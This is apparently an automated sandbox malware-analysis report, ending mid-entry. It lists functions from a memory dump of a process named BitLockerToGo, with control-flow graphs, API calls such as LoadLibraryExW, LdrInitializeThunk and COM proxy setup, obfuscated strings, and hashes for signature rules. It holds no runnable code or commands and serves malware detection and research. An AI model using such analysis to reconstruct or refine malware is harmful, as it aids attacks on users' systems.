                                                                                                                                                                  control_flow_graph 42 2b0fe90-2b0ff18 43 2b0ff20-2b0ff29 42->43 43->43 44 2b0ff2b-2b0ff3e 43->44 46 2b0ff45-2b0ff47 44->46 47 2b0ff4c-2b1017f 44->47 48 2b104c5-2b104cc 46->48 49 2b10181 47->49 50 2b101b8-2b101d8 47->50 51 2b10190-2b101b6 call 2b11f70 49->51 55 2b104b3-2b104c2 50->55 56 2b103b2-2b103cb 50->56 57 2b103d2-2b103f4 50->57 58 2b10414-2b1042d call 2b46f90 50->58 59 2b10434-2b10461 50->59 60 2b10474 50->60 61 2b10278-2b1027a 50->61 62 2b1047b 50->62 63 2b1037a-2b10383 50->63 64 2b101df-2b10271 call 2b0ca80 50->64 65 2b1029f-2b102a6 50->65 66 2b1049f 50->66 67 2b10480 50->67 68 2b10483-2b1048d 50->68 69 2b10287-2b10298 50->69 70 2b104a6-2b104ad 50->70 71 2b102a8-2b102c2 50->71 72 2b10388-2b10394 50->72 73 2b10468-2b1046d 50->73 51->50 55->48 56->55 56->57 56->58 56->59 56->60 56->62 56->66 56->67 56->68 56->70 56->73 87 2b103fb-2b1040d 57->87 58->55 58->59 58->60 58->62 58->66 58->67 58->70 58->73 59->55 59->60 59->62 59->66 59->67 59->70 59->73 60->62 61->69 62->67 77 2b10490-2b10499 63->77 64->55 64->56 64->57 64->58 64->59 64->60 64->61 64->62 64->63 64->65 64->66 64->67 64->68 64->69 64->70 64->71 64->72 64->73 74 2b102fc-2b10320 65->74 66->70 67->68 68->77 69->55 69->56 69->57 69->58 69->59 69->60 69->62 69->63 69->65 69->66 69->67 69->68 69->70 69->71 69->72 69->73 70->55 75 2b102c4 71->75 76 2b102f6-2b102f9 71->76 85 2b1039b-2b103ab 72->85 73->55 73->60 73->62 73->66 73->67 73->70 82 2b10322 74->82 83 2b10356-2b10373 74->83 80 2b102d0-2b102f4 call 2b12070 75->80 76->74 77->66 80->76 93 2b10330-2b10354 call 2b11fe0 82->93 83->55 83->56 83->57 83->58 83->59 83->60 83->62 83->63 83->66 83->67 83->68 83->70 83->72 83->73 85->55 85->56 85->57 85->58 85->59 85->60 85->62 85->66 85->67 85->68 85->70 85->73 87->55 87->58 87->59 87->60 87->62 87->66 87->67 87->70 87->73 93->83
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: !cBa$#{*y$<o3m$@S>Q$tC;A
                                                                                                                                                                  • API String ID: 0-4290739212
                                                                                                                                                                  • Opcode ID: bc81f0f365091fd08336bd29c696ea4925b8c2ff8b3b61cd6a6372260317589e
                                                                                                                                                                  • Instruction ID: 0c1dfc7974d441bfac5b127228fdd9e6c06e9ab318bd289d60b78ae7eee3215a
                                                                                                                                                                  • Opcode Fuzzy Hash: bc81f0f365091fd08336bd29c696ea4925b8c2ff8b3b61cd6a6372260317589e
                                                                                                                                                                  • Instruction Fuzzy Hash: 40F11DB5510B008FD3309F25D895B9BBBF5FB49318F508E1CE9AA8BA90D774A455CF80
                                                                                                                                                                  Function 02B104E0 Relevance: 6.6, Strings: 5, Instructions: 382COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 99 2b104e0-2b1073d 100 2b1076d-2b10791 99->100 101 2b1073f 99->101 106 2b107c6-2b107f1 100->106 107 2b10946-2b10962 100->107 108 2b10798-2b107a1 100->108 109 2b1084b-2b1084f 100->109 110 2b1086b-2b10887 100->110 111 2b1093d-2b10941 100->111 102 2b10740-2b1076b call 2b11a20 101->102 102->100 114 2b107f3 106->114 115 2b1082b-2b10844 106->115 117 2b10af0-2b10b15 107->117 118 2b10b90-2b10b94 107->118 119 2b10ad3-2b10adf 107->119 120 2b10b77 107->120 121 2b10ab8-2b10aba 107->121 122 2b10b5d-2b10b62 107->122 123 2b10b7d 107->123 124 2b10b1c-2b10b21 107->124 125 2b10b9e 107->125 126 2b10b42-2b10b56 call 2b46f90 107->126 127 2b10969-2b109de 107->127 128 2b10b69-2b10b70 107->128 129 2b10a8d-2b10aa1 107->129 108->106 130 2b10bac-2b10bcb 109->130 112 2b108b9-2b108ea 110->112 113 2b10889 110->113 116 2b10ba5 111->116 132 2b1091b-2b1092a 112->132 133 2b108ec-2b108ef 112->133 131 2b10890-2b108b7 call 2b11b80 113->131 137 2b10800-2b10829 call 2b11a90 114->137 115->107 115->109 115->110 115->111 116->130 117->118 117->120 117->123 117->124 117->125 117->128 118->125 119->124 138 2b10ac1-2b10acc 121->138 122->118 122->120 122->123 122->124 122->125 122->128 123->118 142 2b10b28-2b10b3b 124->142 125->116 126->117 126->118 126->120 126->122 126->123 126->124 126->125 126->128 135 2b109e0-2b10a09 call 2b11c00 127->135 136 2b10a0b-2b10a13 127->136 128->118 128->120 128->123 128->125 150 2b10aa8-2b10ab1 129->150 130->117 130->118 130->119 130->120 130->121 130->122 130->123 130->124 130->125 130->126 130->127 130->128 130->129 131->112 153 2b1092d-2b10936 132->153 141 2b108f0-2b10919 call 2b11b10 133->141 135->136 145 2b10a32-2b10a42 136->145 146 2b10a15-2b10a1f 136->146 137->115 138->117 138->118 138->119 138->120 138->122 138->123 138->124 138->125 138->126 138->128 141->132 142->117 142->118 142->120 142->122 142->123 142->124 142->125 142->126 142->128 156 2b10a44-2b10a46 145->156 157 2b10a66-2b10a86 145->157 155 2b10a20-2b10a30 146->155 150->117 150->118 150->119 150->120 150->121 150->122 150->123 150->124 150->125 150->126 150->128 153->107 153->111 155->145 155->155 160 2b10a50-2b10a62 156->160 157->129 160->160 161 2b10a64 160->161 161->157
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: $#$AQ$R($X'e%$hi
                                                                                                                                                                  • API String ID: 0-3848589028
                                                                                                                                                                  • Opcode ID: df7731914003d12b800f7d1c29c4010971b67eb2401fec002227262035bcb581
                                                                                                                                                                  • Instruction ID: cfe5ea618dcf636081c453b7aaee560cee9a716131281f14dd2caee6c06faa62
                                                                                                                                                                  • Opcode Fuzzy Hash: df7731914003d12b800f7d1c29c4010971b67eb2401fec002227262035bcb581
                                                                                                                                                                  • Instruction Fuzzy Hash: 17F131B4508380AFD320AF24D984B6FBBF4EB86784F909C5CF5899B250D7349895DF52
                                                                                                                                                                  Function 02B47A0E Relevance: 3.9, Strings: 3, Instructions: 160COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 163 2b47a0e-2b47a11 164 2b47a23-2b47a51 163->164 165 2b47a18-2b47a1a 163->165 166 2b47a86-2b47a91 164->166 167 2b47a53 164->167 165->164 169 2b47a93-2b47a9b 166->169 170 2b47ade-2b47aea 166->170 168 2b47a60-2b47a84 call 2b48af0 167->168 168->166 174 2b47aa0-2b47aa7 169->174 170->164 170->165 171 2b47a0c 170->171 172 2b478e9-2b478fb call 2b45d90 170->172 171->163 182 2b47921-2b4797a 172->182 183 2b478fd-2b47902 172->183 177 2b47ab0-2b47ab6 174->177 178 2b47aa9-2b47aac 174->178 177->170 181 2b47ab8-2b47ad6 call 2b47590 177->181 178->174 180 2b47aae 178->180 180->170 188 2b47adb 181->188 186 2b479a6-2b479b1 182->186 187 2b4797c-2b4797f 182->187 185 2b47910-2b4791f 183->185 185->182 185->185 190 2b479b7-2b479bf 186->190 191 2b478e3 186->191 189 2b47980-2b479a4 call 2b48af0 187->189 188->170 189->186 193 2b479c0-2b479c7 190->193 191->172 195 2b479e0-2b479e9 193->195 196 2b479c9-2b479cc 193->196 195->191 197 2b479ef-2b479fe call 2b47590 195->197 196->193 198 2b479ce 196->198 201 2b47a03 197->201 198->191
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: %sgh$KJUT$KJUT
                                                                                                                                                                  • API String ID: 0-3285353332
                                                                                                                                                                  • Opcode ID: c2d9f5119b5c896891363ffe19f695903e114f0c5a9cc8b3a67ea678020306b4
                                                                                                                                                                  • Instruction ID: 658634999a9d89a72e3174c3aa03f21d2179d9ea0de0b165515f7d9614bfb750
                                                                                                                                                                  • Opcode Fuzzy Hash: c2d9f5119b5c896891363ffe19f695903e114f0c5a9cc8b3a67ea678020306b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 5651C270901225DBDF14CF94CC90BBEB7B2FF09305F644888D612AB390DB759951EB90
                                                                                                                                                                  Function 02B48070 Relevance: 2.6, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 263 2b48070-2b4808a 264 2b480b6-2b480c1 263->264 265 2b4808c-2b4808f 263->265 267 2b48102-2b48104 264->267 268 2b480c3-2b480cf 264->268 266 2b48090-2b480b4 call 2b48af0 265->266 266->264 269 2b4810b 267->269 270 2b4812b 267->270 272 2b480d0-2b480d7 268->272 274 2b480d9-2b480dc 272->274 275 2b480fa-2b48100 272->275 274->272 277 2b480de 274->277 275->267 276 2b48110-2b4811a call 2b47590 275->276 279 2b4811f-2b48124 276->279 277->267 279->269 279->270
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b$KJUT
                                                                                                                                                                  • API String ID: 0-2403488965
                                                                                                                                                                  • Opcode ID: a8682634d7a27e75f6f258dc573d9dd964b12cf17e55c09d01a6242eac47c959
                                                                                                                                                                  • Instruction ID: ac8cd518f4524f25b9d196251bc095fe783049802e8e6b5bbd26ea55d3b75e0e
                                                                                                                                                                  • Opcode Fuzzy Hash: a8682634d7a27e75f6f258dc573d9dd964b12cf17e55c09d01a6242eac47c959
                                                                                                                                                                  • Instruction Fuzzy Hash: 07115E70D14226CBDF109F94DCD16BEB7B2FB0A342F581891D511AB241EB70E851EB60
                                                                                                                                                                  Function 02B47590 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 312 2b47590-2b475c2 LdrInitializeThunk
                                                                                                                                                                  APIs
                                                                                                                                                                  • LdrInitializeThunk.NTDLL(02B4AF6D,005C003F,00000006,?,?,00000018,D4D5CACB,?,?), ref: 02B475BE
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                  Function 02B478BC Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 396 2b478bc-2b478d6 call 2b47590 400 2b478e0 396->400 401 2b478e9-2b478fb call 2b45d90 396->401 403 2b478e3 400->403 405 2b47921-2b4797a 401->405 406 2b478fd-2b47902 401->406 403->401 408 2b479a6-2b479b1 405->408 409 2b4797c-2b4797f 405->409 407 2b47910-2b4791f 406->407 407->405 407->407 408->403 411 2b479b7-2b479bf 408->411 410 2b47980-2b479a4 call 2b48af0 409->410 410->408 413 2b479c0-2b479c7 411->413 415 2b479e0-2b479e9 413->415 416 2b479c9-2b479cc 413->416 415->403 417 2b479ef-2b479fe call 2b47590 415->417 416->413 418 2b479ce 416->418 420 2b47a03 417->420 418->400
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: KJUT
                                                                                                                                                                  • API String ID: 2994545307-3147183306
                                                                                                                                                                  • Opcode ID: b9f1906a32dac91c087eb9d4cf51ad4202807e76c6563fa94bc13224ba5c568d
                                                                                                                                                                  • Instruction ID: 2f0840ad345e0abdf4964e50da83210fe5b126bd3f122fbdc60e4d8eca4d3928
                                                                                                                                                                  • Opcode Fuzzy Hash: b9f1906a32dac91c087eb9d4cf51ad4202807e76c6563fa94bc13224ba5c568d
                                                                                                                                                                  • Instruction Fuzzy Hash: CD31C4B1D00225EBDF148F94C891BBEB7B2FF09304F544888D605BF291DB769951EB90
                                                                                                                                                                  Function 02B0D360 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 146threadCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentProcess$ExitInputStateThread
                                                                                                                                                                  • String ID: 3016$?<=2
                                                                                                                                                                  • API String ID: 1029096631-3137901931
                                                                                                                                                                  • Opcode ID: 59d618e5f3b7dd37996c74cfe5a26bf075cc027d159eb36eeacfa843e5999b42
                                                                                                                                                                  • Instruction ID: d0af5b92da68750456374a68b6cf1592ce8afc9d6ae3b8b05f26182c97d1fa8e
                                                                                                                                                                  • Opcode Fuzzy Hash: 59d618e5f3b7dd37996c74cfe5a26bf075cc027d159eb36eeacfa843e5999b42
                                                                                                                                                                  • Instruction Fuzzy Hash: F241F2B440C2819BD302AFA8D594A1EFFE6EF52649F088D9CE5C587292C73AD450CB63
                                                                                                                                                                  Function 02B0EED0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 219libraryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 202 2b0eed0-2b0ef36 203 2b0ef38 202->203 204 2b0ef7b-2b0efd3 202->204 205 2b0ef40-2b0ef79 call 2b114a0 203->205 206 2b0efd5 204->206 207 2b0f00c-2b0f01e LoadLibraryExW call 2b45d70 204->207 205->204 209 2b0efe0-2b0f00a call 2b11430 206->209 213 2b0f023-2b0f026 207->213 209->207 215 2b0f0c0-2b0f109 call 2b4a410 * 3 213->215 216 2b0f1e0-2b0f1f5 call 2b40ef0 213->216 217 2b0f401-2b0f410 213->217 218 2b0f034-2b0f05f call 2b4a410 * 2 213->218 219 2b0f114-2b0f1d2 call 2b4a410 * 7 213->219 220 2b0f067-2b0f0b5 call 2b4a410 * 3 213->220 221 2b0f02d-2b0f92e 213->221 215->219 216->217 218->220 219->216 219->217 220->215
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(39AD3BA5,00000000,dcji), ref: 02B0F016
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: dcji
                                                                                                                                                                  • API String ID: 1029625771-1961726176
                                                                                                                                                                  • Opcode ID: 840cf11cbc820e3ebf516c634a5c15509b7c86e0b3db7bcaa8f84d34102a927f
                                                                                                                                                                  • Instruction ID: a93524143a1496788a717ae430fdd0698cbea8127bc24c15ff0c4be11cb13762
                                                                                                                                                                  • Opcode Fuzzy Hash: 840cf11cbc820e3ebf516c634a5c15509b7c86e0b3db7bcaa8f84d34102a927f
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A71A1F4C503249FDB51AF64EC8AAAD7F75FB05346F8409A5E8086B241EB310A64DF51
                                                                                                                                                                  Function 02B46928 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 67libraryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 255 2b46928-2b46967 256 2b46994-2b469a0 LoadLibraryExW 255->256 257 2b46969 255->257 259 2b469a6-2b469cf 256->259 260 2b46f21-2b46f5b 256->260 258 2b46970-2b46992 call 2b47380 257->258 258->256 259->260
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800), ref: 02B4699C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                  • String ID: J"-s
                                                                                                                                                                  • API String ID: 1029625771-117608354
                                                                                                                                                                  • Opcode ID: 085fabcd83314a4a0502290e93ee4ea7ce44e79889dcd79fef89575623ba6bb5
                                                                                                                                                                  • Instruction ID: b135acecf52fdea822070b0c59bb6908547aba04cedee0973aed3a6c447eb5b0
                                                                                                                                                                  • Opcode Fuzzy Hash: 085fabcd83314a4a0502290e93ee4ea7ce44e79889dcd79fef89575623ba6bb5
                                                                                                                                                                  • Instruction Fuzzy Hash: 5A213871A403569FDB09CFA8D4907BEBBB6BF49240FA8845CD445E7381C730AE52CB60
                                                                                                                                                                  Function 02B46F90 Relevance: 1.6, APIs: 1, Instructions: 71memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 280 2b46f90-2b46fa4 281 2b47037-2b47038 call 2b44470 280->281 282 2b46fd0 280->282 283 2b46fd2-2b46fdf 280->283 284 2b4702c-2b4702d call 2b443e0 280->284 285 2b46fb9-2b46fcf 280->285 286 2b46fab-2b46fb2 280->286 294 2b4703d-2b47040 281->294 282->283 287 2b47016-2b4702a RtlReAllocateHeap 283->287 288 2b46fe1 283->288 293 2b47032-2b47035 284->293 285->282 286->281 286->282 286->283 286->285 292 2b47042 287->292 291 2b46ff0-2b47014 call 2b47500 288->291 291->287 296 2b47045-2b47047 292->296 293->296 294->292
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(096E0F46,00000000), ref: 02B47024
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: 5b529a08b0dab8573f5a1b35418ae6dbcaffb5b83ed821e9b9f48bdc7bd638d3
                                                                                                                                                                  • Instruction ID: 4dc097fca676eaf2177a08115934203c20b27ae90547de1ea1894922c20dd44a
                                                                                                                                                                  • Opcode Fuzzy Hash: 5b529a08b0dab8573f5a1b35418ae6dbcaffb5b83ed821e9b9f48bdc7bd638d3
                                                                                                                                                                  • Instruction Fuzzy Hash: E511E130909250DBC311AF28E984A1BFBF4EF86744F454C68E4C49B311DB39E820EBA3
                                                                                                                                                                  Function 02B443E0 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 298 2b443e0-2b443f8 299 2b44426-2b44443 RtlAllocateHeap 298->299 300 2b443fa 298->300 301 2b44400-2b44424 call 2b47410 300->301 301->299
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(096E0F46,00000000,?), ref: 02B44437
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: 8e0b68d7e288ba46a28d764df04ad6b7e21f9bb22f34b9a350c48867707c4457
                                                                                                                                                                  • Instruction ID: 526d6ce1c19511035278e72fc119b064ba4380d9b7ef0446b0262c5af203680f
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e0b68d7e288ba46a28d764df04ad6b7e21f9bb22f34b9a350c48867707c4457
                                                                                                                                                                  • Instruction Fuzzy Hash: CBF0F4345082409FD305EB18E994A2EFBF5EB5A705F444D5CE4C487261CB31E820DB12
                                                                                                                                                                  Function 02B44470 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 304 2b44470-2b4447f 305 2b44486-2b4449b 304->305 306 2b444d9-2b444dd 304->306 307 2b444c6-2b444d3 RtlFreeHeap 305->307 308 2b4449d-2b4449f 305->308 307->306 309 2b444a0-2b444c4 call 2b47490 308->309 309->307
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlFreeHeap.NTDLL(096E0F46,00000000), ref: 02B444D3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                  • Opcode ID: 34be7e04397a778b075d8f67a08eeddbcc4e3e7d5a6b37e68479ba471c34bd1a
                                                                                                                                                                  • Instruction ID: 821909bde5930c3c7664fa3e47b6df7680b28d7b14f5c2009b72ea56579b99b0
                                                                                                                                                                  • Opcode Fuzzy Hash: 34be7e04397a778b075d8f67a08eeddbcc4e3e7d5a6b37e68479ba471c34bd1a
                                                                                                                                                                  • Instruction Fuzzy Hash: CCF049349082509BC301EF28E884A1EFBF5EF4A709F4A4C68E4C49B251C735D864DBA6

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 02B407BC Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 297memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(67), ref: 02B40840
                                                                                                                                                                  • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,?,00000000,00000000,?), ref: 02B40889
                                                                                                                                                                  • SysAllocString.OLEAUT32(43F341F7), ref: 02B408F0
                                                                                                                                                                  • SysAllocString.OLEAUT32(D109CF19), ref: 02B409B0
                                                                                                                                                                  • VariantInit.OLEAUT32(00000000), ref: 02B40A40
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 02B40AF8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocString$Variant$BlanketClearInitProxy
                                                                                                                                                                  • String ID: 67$lc
                                                                                                                                                                  • API String ID: 2040582028-1651600137
                                                                                                                                                                  • Opcode ID: 43bb04199ac25f092013a0f815f352eeb09f192a677154678c7e1f692f926e09
                                                                                                                                                                  • Instruction ID: c788a3e4eda27f4d7f12d067a9e1e5c66a21cd85a2f8663e2b1668e54127e7be
                                                                                                                                                                  • Opcode Fuzzy Hash: 43bb04199ac25f092013a0f815f352eeb09f192a677154678c7e1f692f926e09
                                                                                                                                                                  • Instruction Fuzzy Hash: 34B12FB4548381AFD3109F64D884B1EBBF5BB8A745F148C0CF6889B291CB78E956CF52
                                                                                                                                                                  Function 02B20770 Relevance: 21.2, Strings: 16, Instructions: 1181COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: ()&'$22.h$8967$@$@AFG$Aq$DEJK$HINO$WVIH$`afg$dejk$hino$kjml$pqvw$tuz{$|}bc
                                                                                                                                                                  • API String ID: 2994545307-2452504087
                                                                                                                                                                  • Opcode ID: bdf965cacfa3fa7c1cec0a33e6e4a23e6e1a0fea142cfe31ada704384d32ecbb
                                                                                                                                                                  • Instruction ID: 249f5fb2d903f4f224b277576614ab2a150f4e1a1e8f336e55d9ca2fcdafb056
                                                                                                                                                                  • Opcode Fuzzy Hash: bdf965cacfa3fa7c1cec0a33e6e4a23e6e1a0fea142cfe31ada704384d32ecbb
                                                                                                                                                                  • Instruction Fuzzy Hash: ACA268B15183919BE730DF14C880BABBBE1FB95744F54896CE5CC9B291EB349848CF92
                                                                                                                                                                  Function 02B2C227 Relevance: 17.9, Strings: 14, Instructions: 437COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
